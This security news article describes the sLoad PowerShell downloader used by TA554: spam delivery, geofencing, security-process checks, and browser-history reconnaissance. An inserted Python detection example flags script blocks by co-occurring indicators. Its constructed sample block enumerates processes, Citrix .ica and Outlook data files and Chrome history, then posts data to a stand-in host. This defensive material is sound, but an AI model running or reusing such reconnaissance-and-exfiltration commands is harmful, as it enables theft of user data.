Stealthy sLoad Downloader Performs Extensive Reconnaissance to Improve Quality of Infected Hosts

A new PowerShell downloader has been discovered – the sLoad downloader – which is being used in stealthy, highly targeted attacks in the United Kingdom and Italy. The sLoad downloader performs a wide range of checks to find out a great deal of information about the system on which it resides, before choosing the most appropriate malicious payload to deploy – if a payload is deployed at all.

The sLoad downloader was first identified in May 2018 when it was primarily being used to download the Ramnit banking Trojan, although more recently it has been delivering a much wider range of malicious payloads including Ursnif, PsiBot, DarkVNC, and Gootkit, according to security researchers at Proofpoint who have been analyzing the threat.

The malware is understood to be the work of a threat actor known as TA554 that Proofpoint has been tracking for more than a year. sLoad is being used in highly targeted attacks, mainly in the UK and Italy, although the group also frequently targets Canadian businesses.

sLoad is part of a growing breed of downloaders developed to keep attacks stealthy and improve the quality of infected hosts. The problem with infecting as many machines as possible is that such attacks are noisy and rapidly detected, giving security researchers plenty of time to analyze the malware, add signatures to AV software, and develop patches.

While the spray-and-pray tactic of infecting as many end users as possible continues, especially among affiliates signed up to use ransomware-as-a-service, there has been a growing trend over the last few months toward a much stealthier breed of malware – malware that stays under the radar for longer and goes to great lengths to find out more about a system before attacks are launched.

Infection primarily occurs via spam emails, which are carefully crafted, written in the targeted country’s language, and include personalized information such as the target’s name and address to add credibility. The most common subjects and message themes are missed package deliveries and purchase orders, which are detailed in documents attached to the emails. Hyperlinks are also used to link to zip files containing the documents. The documents contain malicious macros that launch PowerShell scripts, which download the sLoad downloader.

The threat group extensively uses geofencing at all points in the infection chain. This restricts infection to specific locations and dictates what actions are taken when a host is infected. This is particularly important when the final payload is a banking Trojan: banking Trojans target country-specific banks and use web injects written for those specific banks, so a payload delivered to a host in the wrong country is of little use to the attacker.

The sLoad downloader checks whether certain security processes are running on a system, and will exit if those processes are found. A list of all running processes is collected and sent back to its C2 server along with details of Citrix-related .ICA files, Outlook files, and a wide range of other system information. sLoad also checks browsing histories to determine whether the user has previously visited banks that are being targeted and reports back on its findings.

If the infected device has been used to access a banking website that Ramnit is targeting, the banking Trojan will be downloaded, although other malware variants can also be delivered depending on the information discovered during the reconnaissance phase.
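The reconnaissance behaviour described in the two paragraphs above (process enumeration, searching for Citrix .ICA and Outlook data files, reading browser history, and posting the results to a C2 server) is most visible to defenders in PowerShell Script Block Logging (Event ID 4104). The following Python is an added example, not code from the article or from Proofpoint, showing how a detection engineer might score script blocks by how many distinct reconnaissance indicators appear together. The script-block texts, block identifiers, indicator names and the threshold of three are all constructed for illustration and are not real sLoad samples.

```python
import re

# Constructed sample script-block texts, as they might be extracted from
# PowerShell Script Block Logging (Event ID 4104). These are illustrative
# inputs, not captured sLoad code.
SAMPLE_SCRIPT_BLOCKS = [
    # A lone process listing: common in admin scripts, not suspicious by itself.
    ("block-1", "Get-Process | Select-Object Name | Out-String"),
    # Several reconnaissance steps combined in one block, then an outbound POST.
    ("block-2", """
$p = Get-Process | Select-Object -ExpandProperty Name
$ica = Get-ChildItem -Path $env:USERPROFILE -Recurse -Include *.ica -ErrorAction SilentlyContinue
$ost = Get-ChildItem -Path $env:LOCALAPPDATA\\Microsoft\\Outlook -Include *.ost,*.pst -Recurse
$hist = Get-Content "$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\History"
Invoke-WebRequest -Uri http://example.invalid/report -Method Post -Body $p
"""),
    # Benign file housekeeping: no reconnaissance indicators.
    ("block-3", "Get-ChildItem C:\\Temp -Recurse -Include *.log"),
]

# Each indicator maps a behaviour named in the article to a pattern over the
# script text. Patterns are deliberately broad; the signal comes from several
# of them co-occurring in one block, not from any single match.
INDICATORS = {
    "process_enumeration": re.compile(r"\bGet-Process\b|\btasklist\b", re.I),
    "citrix_ica_search":   re.compile(r"\*\.ica\b", re.I),
    "outlook_data_files":  re.compile(r"\*\.(?:ost|pst)\b|\\Outlook\b", re.I),
    "browser_history":     re.compile(r"\\History\b|places\.sqlite", re.I),
    "outbound_post":       re.compile(
        r"\b(?:Invoke-WebRequest|Invoke-RestMethod)\b.*-Method\s+Post", re.I | re.S),
}


def indicators_in(script_text):
    """Return the set of indicator names whose pattern matches the script block."""
    return {name for name, rx in INDICATORS.items() if rx.search(script_text)}


def analyze(blocks, threshold=3):
    """Score each (block_id, text) pair.

    Returns a list of (block_id, sorted indicator names, flagged) tuples.
    A block is flagged when at least `threshold` distinct reconnaissance
    indicators appear together, which is what separates a host-profiling
    downloader from an ordinary admin script that happens to list processes.
    """
    results = []
    for block_id, text in blocks:
        hits = indicators_in(text)
        results.append((block_id, sorted(hits), len(hits) >= threshold))
    return results


if __name__ == "__main__":
    for block_id, hits, flagged in analyze(SAMPLE_SCRIPT_BLOCKS):
        status = "FLAG" if flagged else "ok"
        print(f"{block_id}: {status:4} indicators={hits}")
```

The threshold-based approach matters because each individual action (listing processes, enumerating files, a web request) is routine on its own; what characterises a fingerprinting downloader is the breadth of system profiling performed in a single script before anything is sent out. In a real pipeline the indicator list would be tuned against the organisation's own administrative scripts to keep false positives down.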

“sLoad, like other downloaders we have profiled recently, fingerprints infected systems, allowing threat actors to better choose targets of interest for the payloads of their choice,” wrote Proofpoint. “Downloaders, though, like sLoad, Marap and others, provide high degrees of flexibility to threat actors, whether avoiding vendor sandboxes, delivering ransomware to a system that appears mission critical, or delivering a banking Trojan to systems with the most likely return.”

Author: NetSec Editor